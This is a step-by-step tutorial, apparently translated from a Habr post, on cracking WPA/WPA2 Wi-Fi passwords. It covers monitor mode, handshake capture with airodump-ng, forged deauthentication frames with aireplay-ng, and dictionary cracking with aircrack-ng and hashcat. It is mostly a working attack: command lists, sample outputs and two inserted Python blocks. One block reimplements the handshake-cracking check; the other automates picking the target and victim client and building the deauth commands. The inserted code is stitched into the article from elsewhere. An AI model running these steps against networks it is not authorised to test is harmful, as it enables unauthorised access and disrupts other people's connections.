
Hacking Wi-Fi

Hacking WPA / WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng / Hashcat



This is a quick walkthrough that demonstrates how to crack Wi-Fi networks protected by weak passwords. It is not exhaustive, but it should be enough to test the security of your own network, or of a network you have been authorised to test. The attack described below is completely passive (your card only listens; nothing is transmitted), so the target cannot detect it; the only observable event is you later joining the network with the recovered password. An optional active attack with deauthentication can be used to speed up handshake capture; it is described at the end of the article.



If you are already familiar with the process, skip the explanations and go straight to the command list at the end. Additional suggestions and alternative methods are collected in the appendix.



DISCLAIMER: This software / manual is intended for educational purposes only. It must not be used for illegal activity. The author is not responsible for its use. Don't be a jerk.



Getting started



This guide assumes that you:




Hacking a Wi-Fi network



Monitor mode



Let's start with a list of wireless interfaces that support monitor mode:



airmon-ng



If no interface is listed, your card does not support monitor mode. :(



Suppose your interface is named wlan0 (substitute the real name if yours differs). Next, put the interface into monitor mode:



airmon-ng start wlan0



Run iwconfig . You should now see a new monitor-mode interface (most likely mon0 or wlan0mon ). If yours is not called mon0, use its real name wherever mon0 appears in the commands below.



Find a target



Start listening for the beacon frames broadcast by nearby wireless routers, using your monitor interface:



airodump-ng mon0



You should see something like this.



 CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 14:91:82:F7:52:EB  -66      205       26    0   1  54e  OPN              belkin.2e8.guests
 14:91:82:F7:52:E8  -64      212       56    0   1  54e  WPA2 CCMP   PSK  belkin.2e8
 14:22:DB:1A:DB:64  -81       44        7    0   1  54   WPA2 CCMP        <length:  0>
 14:22:DB:1A:DB:66  -83       48        0    0   1  54e. WPA2 CCMP   PSK  steveserro
 9C:5C:8E:C9:AB:C0  -81       19        0    0   3  54e  WPA2 CCMP   PSK  hackme
 00:23:69:AD:AF:94  -82      350        4    0   1  54e  WPA2 CCMP   PSK  Kaitlin's Awesome
 06:26:BB:75:ED:69  -84      232        0    0   1  54e. WPA2 CCMP   PSK  HH2
 78:71:9C:99:67:D0  -82      339        0    0   1  54e. WPA2 CCMP   PSK  ARRIS-67D2
 9C:34:26:9F:2E:E8  -85       40        0    0   1  54e. WPA2 CCMP   PSK  Comcast_2EEA-EXT
 BC:EE:7B:8F:48:28  -85      119       10    0   1  54e  WPA2 CCMP   PSK  root
 EC:1A:59:36:AD:CA  -86      210       28    0   1  54e  WPA2 CCMP   PSK  belkin.dca


Capture 4-Way Handshake



WPA / WPA2 uses a 4-way handshake to authenticate devices joining the network. The details do not matter for now; what matters is that the handshake contains enough material to test password guesses offline, so you need to capture one in order to crack the network password. A handshake occurs every time a device connects to the network, for example when your neighbour comes home from work. To capture one, we point airodump-ng at the target network, using the channel and BSSID found by the previous command.



# replace the -c and --bssid values with those of your target network

# -w sets the output file prefix; with "." the capture is written to the current directory as -01.cap

airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0




 CH  6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 9C:5C:8E:C9:AB:C0  -47   0      140        0    0   6  54e  WPA2 CCMP   PSK  ASUS


Now we wait... (This sample output comes from a different capture, the ASUS network on channel 6; the -c value must match the channel your own target is on.) As soon as a handshake is captured, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 ] in the upper right corner of the screen, next to the elapsed time.



If you do not want to wait and an active attack is acceptable, you can force devices on the network to reconnect by forcibly disconnecting them: you send forged deauthentication frames to a client. This usually yields a 4-way handshake within seconds. See the section on the deauthentication attack below.



Once you have captured the handshake, press ctrl-c to quit airodump-ng . You will find a .cap file in the location you told airodump-ng to write to (most likely called -01.cap ). This capture file is what we crack the network password from. I like to rename it after the network we are attacking:



mv ./-01.cap hackme.cap



Cracking the network password



The last step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend hashcat. I wrote a small wrapper that makes hashcat easy to use: it is called naive-hashcat . If you have no GPU, you can use an online GPU cracking service such as GPUHASH.me or OnlineHashCrack (bear in mind that you are handing the handshake, and therefore potentially the password, to a third party). You can also try a CPU dictionary attack with Aircrack-ng.



Note that both attack methods below assume a relatively weak, user-chosen password. Most WPA / WPA2 routers ship with strong 12-character random passwords, which most users (sensibly) leave unchanged. If you are trying to crack one of those, I recommend the WPA-length Probable-Wordlists dictionary files.



Hacking with naive-hashcat (recommended method)

Before you start cracking with naive-hashcat, convert the .cap file to hashcat's .hccapx format. This is easily done either by uploading the .cap file to https://hashcat.net/cap2hccapx/ or by using the cap2hccapx tool directly. (Newer hashcat releases have deprecated mode 2500 and the .hccapx format in favour of mode 22000; there the conversion is hcxpcapngtool -o hackme.hc22000 hackme.cap from hcxtools, and HASH_TYPE=22000 below.)



cap2hccapx.bin hackme.cap hackme.hccapx



Then we download and run naive-hashcat :



# download

git clone https://github.com/brannondorsey/naive-hashcat

cd naive-hashcat



# download the 134MB rockyou dictionary file

curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt



# crack ! baby ! crack !

# 2500 is the hashcat hash mode for WPA/WPA2 (.hccapx); use 22000 with an .hc22000 file on hashcat versions that have deprecated 2500

HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh




Naive-hashcat runs a series of dictionary , rule , combinator and mask (smart brute force) attacks. Against a moderately strong password this can take days or even months. The cracked password is saved to hackme.pot, so check that file periodically. As soon as the password is cracked, you will see a line like this in POT_FILE :



e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet



The colon-separated fields are the EAPOL MIC from the handshake, the AP MAC, the client MAC, the network name (ESSID) and the password.
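To make concrete what the cracker actually checks (the 4-way handshake captured above, and the MIC that leads the pot-file line), here is a pure-Python model of that check. It is an added example, not code from the article, from hashcat or from aircrack-ng. The AP MAC, client MAC, ESSID and passphrase are the ones shown on this page; the nonces and the EAPOL message are constructed so that the handshake is self-consistent and are not a real capture. The passphrase-to-PMK step is checked against the published IEEE 802.11 test vector (passphrase "password", SSID "IEEE").

```python
import hashlib
import hmac
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    These 4096 rounds are almost the whole cost of every guess, which is why GPUs help so much."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes, length: int = 48) -> bytes:
    """802.11i PRF-384: PTK = PRF(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA)
    || min(ANonce,SNonce) || max(ANonce,SNonce)). Every input except the PMK is in the capture."""
    b = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out, i = b"", 0
    while len(out) < length:
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:length]


MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the Key MIC


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Recompute the EAPOL-Key MIC over the frame with its MIC field zeroed."""
    version = int.from_bytes(eapol[5:7], "big") & 0x7      # Key Descriptor Version bits of Key Information
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:                                        # WPA / TKIP
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:                                        # WPA2 / CCMP
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise NotImplementedError("Key Descriptor Version 3 uses AES-128-CMAC, not available in the stdlib")


def crack_handshake(hs: dict, wordlist: Iterable[str]) -> Optional[str]:
    """The offline check aircrack-ng and hashcat run for every candidate passphrase."""
    for passphrase in wordlist:
        if not 8 <= len(passphrase) <= 63:                  # outside WPA's passphrase limits: cannot be right
            continue
        pmk = pmk_from_passphrase(passphrase, hs["ssid"])
        ptk = ptk_from_pmk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
        kck = ptk[:16]                                      # KCK = first 128 bits of the PTK
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return passphrase
    return None


# ---- constructed test data (not a real capture) ----
def _build_eapol_m2(snonce: bytes, replay_counter: int = 1) -> bytes:
    """Minimal EAPOL-Key message 2: RSN descriptor, version 2, Pairwise + MIC bits, empty key data."""
    body = (bytes([2])                                      # Descriptor Type: RSN
            + (0x010A).to_bytes(2, "big")                   # Key Information: MIC | Pairwise | version 2
            + (16).to_bytes(2, "big")                       # Key Length (CCMP)
            + replay_counter.to_bytes(8, "big")
            + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8      # Key IV, Key RSC, Key ID
            + b"\x00" * 16                                  # Key MIC (zero until filled in)
            + (0).to_bytes(2, "big"))                       # Key Data Length
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body   # 802.1X: version 1, type EAPOL-Key


def constructed_handshake(passphrase: str = "hacktheplanet") -> dict:
    """Fabricate a self-consistent handshake for the article's AP, client and ESSID."""
    hs = {
        "ssid": "ASUS",
        "aa": bytes.fromhex("9c5c8ec9abc0"),                # AP MAC from the article
        "spa": bytes.fromhex("64bc0c4897f7"),               # client MAC from the article
        "anonce": hashlib.sha256(b"constructed anonce").digest(),   # made up, deterministic
        "snonce": hashlib.sha256(b"constructed snonce").digest(),   # made up, deterministic
    }
    m2 = _build_eapol_m2(hs["snonce"])
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, hs["ssid"]),
                       hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
    hs["mic"] = eapol_mic(kck, m2)
    hs["eapol"] = m2[:MIC_OFFSET] + hs["mic"] + m2[MIC_OFFSET + 16:]   # as it would appear on the air
    return hs


if __name__ == "__main__":
    hs = constructed_handshake()
    print(crack_handshake(hs, ["password", "12345678", "hacktheplanet"]))
```

The 16-byte value the cracker compares against is the first field of the pot-file line and the "EAPOL HMAC" line aircrack-ng prints. Because every other input is visible in the capture, the cost of each guess is essentially the 4096-round PBKDF2; the PRF and MIC steps are cheap, so the only way to make cracking harder is a passphrase that is not in any wordlist.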



If you prefer to use hashcat without naive-hashcat , then see this page .



Hacking with Aircrack-ng

Aircrack-ng can run a simple CPU dictionary attack. First you need a wordlist; I recommend the famous rockyou list:



# download the 134MB rockyou dictionary file

curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt




Note that if the network password is not among the words in the file, the attack will not find it.



# -a2 selects WPA/WPA2 cracking, -b is the BSSID, -w is the wordlist

aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap




Once the password is found, aircrack-ng prints KEY FOUND! in the terminal window, followed by the password in plain text:



                                 Aircrack-ng 1.2 beta3

                   [00:01:49] 111040 keys tested (1017.96 k/s)

                           KEY FOUND! [ hacktheplanet ]

      Master Key     : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
                       59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E

      Transient Key  : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
                       2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
                       6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
                       8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21

      EAPOL HMAC     : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4


Deauthentication Attack



A deauthentication attack sends forged deauthentication frames from your machine to a client connected to the network you are attacking. The frames carry a spoofed source address, so the client believes they come from the real access point. On receiving one, most clients disconnect and immediately reconnect, giving you a chance to capture the 4-way handshake if airodump-ng is monitoring at the time. (Networks that enforce Protected Management Frames, 802.11w, which WPA3 requires, discard unauthenticated deauthentication frames, so the attack does nothing there and you have to wait for a natural reconnect.)



Use airodump-ng to monitor the specific access point (with -c channel --bssid MAC ) until a client ( STATION ) connects. A connected client looks like this, where 64:BC:0C:48:97:F7 is its MAC address:



 CH  6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 9C:5C:8E:C9:AB:C0  -19  75     1043      144   10   6  54e  WPA2 CCMP   PSK  ASUS

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 9C:5C:8E:C9:AB:C0  64:BC:0C:48:97:F7  -37    1e- 1e     4      6479  ASUS
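Picking the target AP and the client to deauthenticate by eye from the screen works for one network; when run with -w, airodump-ng also writes the same two tables to <prefix>-01.csv, which can be parsed. The following is an added example, not part of the original article: it parses airodump-ng's CSV output, selects a WPA/WPA2-PSK access point by ESSID (enterprise MGT networks have no pre-shared key to crack, so they are skipped), lists the AP's associated clients busiest-first, and assembles the airodump-ng / aireplay-ng command lines used in this article. The embedded CSV is constructed from the values shown on this page, plus a hypothetical unassociated client and a hypothetical enterprise network.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

AP_HEADER = "BSSID, First time seen"
STA_HEADER = "Station MAC, First time seen"


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str      # OPN, WEP, WPA, WPA2, ...
    cipher: str
    auth: str         # PSK (crackable passphrase) or MGT (802.1X, nothing to crack offline)
    power: int        # dBm, negative; larger is stronger
    essid: str


@dataclass
class Station:
    mac: str
    bssid: str        # "(not associated)" when the client is only probing
    power: int
    packets: int


def _fields(line: str) -> List[str]:
    return [f.strip() for f in line.split(",")]


def parse_airodump_csv(text: str) -> Tuple[List[AccessPoint], List[Station]]:
    """Split an airodump-ng CSV into its access-point table and its station table."""
    aps, stations, section = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(AP_HEADER):
            section = "ap"
            continue
        if line.startswith(STA_HEADER):
            section = "sta"
            continue
        f = _fields(line)
        if section == "ap" and len(f) >= 15:
            # ESSID is column 13; an ESSID containing commas spills into extra columns before the trailing Key column
            essid = ",".join(f[13:-1]).strip()
            aps.append(AccessPoint(f[0], int(f[3]), f[5], f[6], f[7], int(f[8]), essid))
        elif section == "sta" and len(f) >= 6:
            stations.append(Station(f[0], f[5], int(f[3]), int(f[4])))
    return aps, stations


def find_target(aps: List[AccessPoint], essid: str) -> Optional[AccessPoint]:
    """The AP to attack: matching ESSID, WPA/WPA2 with a pre-shared key; strongest signal wins if several match."""
    candidates = [a for a in aps if a.essid == essid and "WPA" in a.privacy and "PSK" in a.auth]
    if not candidates:
        return None
    return max(candidates, key=lambda a: a.power)


def clients_of(stations: List[Station], bssid: str) -> List[str]:
    """Clients associated with the AP, busiest first: the most likely to reconnect promptly after a deauth."""
    assoc = [s for s in stations if s.bssid == bssid]
    return [s.mac for s in sorted(assoc, key=lambda s: s.packets, reverse=True)]


def plan_commands(ap: AccessPoint, client: Optional[str] = None, iface: str = "mon0", prefix: str = "capture/") -> List[str]:
    """Assemble the capture and (optional) deauth invocations from the article for the chosen target."""
    cmds = [f"airodump-ng -c {ap.channel} --bssid {ap.bssid} -w {prefix} {iface}"]
    if client:
        cmds.append(f"aireplay-ng -0 2 -a {ap.bssid} -c {client} {iface}")
    return cmds


# Constructed sample in airodump-ng's CSV layout, built from the values shown in the article
# (the D8:0D:17 enterprise AP and the A4:5E:60 probing client are invented).
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
14:91:82:F7:52:EB, 2017-07-23 15:48:10, 2017-07-23 15:49:02,  1,  54, OPN, , , -66,      205,       26,   0.  0.  0.  0,  17, belkin.2e8.guests,
9C:5C:8E:C9:AB:C0, 2017-07-23 15:48:10, 2017-07-23 15:49:02,  6,  54, WPA2, CCMP, PSK, -47,      140,        0,   0.  0.  0.  0,   4, ASUS,
14:22:DB:1A:DB:64, 2017-07-23 15:48:12, 2017-07-23 15:49:01,  1,  54, WPA2, CCMP, PSK, -81,       44,        7,   0.  0.  0.  0,   0, ,
D8:0D:17:00:11:22, 2017-07-23 15:48:15, 2017-07-23 15:49:02, 11,  54, WPA2, CCMP, MGT, -60,       90,        0,   0.  0.  0.  0,   9, corp-wifi,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
64:BC:0C:48:97:F7, 2017-07-23 15:48:30, 2017-07-23 15:49:02, -37,     6479, 9C:5C:8E:C9:AB:C0, ASUS
A4:5E:60:AA:BB:CC, 2017-07-23 15:48:40, 2017-07-23 15:49:00, -70,       12, (not associated), hackme
"""

if __name__ == "__main__":
    aps, stas = parse_airodump_csv(SAMPLE_CSV)
    target = find_target(aps, "ASUS")
    clients = clients_of(stas, target.bssid)
    for cmd in plan_commands(target, clients[0] if clients else None):
        print(cmd)
```

Hidden networks show up with an empty ESSID (airodump-ng prints <length: 0> on screen), so they cannot be selected by name; match on BSSID instead. A client listed as (not associated) is only probing and is not worth deauthenticating, which is why clients_of filters on the AP's BSSID.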


Leave airodump-ng running and open a new terminal window. We use aireplay-ng to send deauthentication frames to the victim client, forcing it to reconnect, and hope for a handshake.



# -0 2 sends 2 deauth frames. Increase this number if needed,

# at the risk of noticeably interrupting the client's network activity

# -a is the MAC of the access point

# -c is the MAC of the client

aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0




Alternatively, you can broadcast deauthentication frames to all clients of the access point:



# not all clients respect broadcast deauths though

aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0




Once the frames have been sent, go back to the airodump-ng window; with luck you will see [ WPA handshake: 9C:5C:8E:C9:AB:C0 ] in the top right. You now have the handshake and can start cracking the network password.



Command list



Below is the list of all the commands needed to crack a WPA / WPA2 network, in order, with minimal description.



# put your network device into monitor mode

airmon-ng start wlan0



# listen for all nearby beacon frames to get target BSSID and channel

airodump-ng mon0



# start listening for the handshake

airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0



# optionally deauth a connected client to force a handshake

aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0



########## crack password with aircrack-ng... ##########



# download 134MB rockyou.txt dictionary file if needed

curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt



# crack w/ aircrack-ng

aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap



########## or crack password with naive-hashcat ##########



# convert cap to hccapx

cap2hccapx.bin capture/-01.cap capture/-01.hccapx



# crack with naive-hashcat (paths are relative to the naive-hashcat checkout)

HASH_FILE=capture/-01.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh




Appendix



The response to this guide was so great that I added tips and additional material from community members to a supplemental appendix . Look there to find out how:





Authorship



The bulk of the information here is drawn from the excellent tutorial by Lewis Encarnacion . Thanks also to the authors and maintainers of Aircrack-ng and Hashcat.



Many thanks to neal1991 for translating this guide into Chinese . Thanks also to hiteshnayak305 , enilfodne , DrinkMoreCodeMore , hivie7510 , cprogrammer1994 , 0XE4 , Hartzell , zeeshanu , flennic , bhusang , tversteeg , gpetrousov , crowchirp and Shark0der on Reddit and GitHub, who contributed tips and typo fixes. If you are interested in additional WPA2 cracking options, read this discussion on Hacker News.

Source: https://habr.com/ru/post/334966/


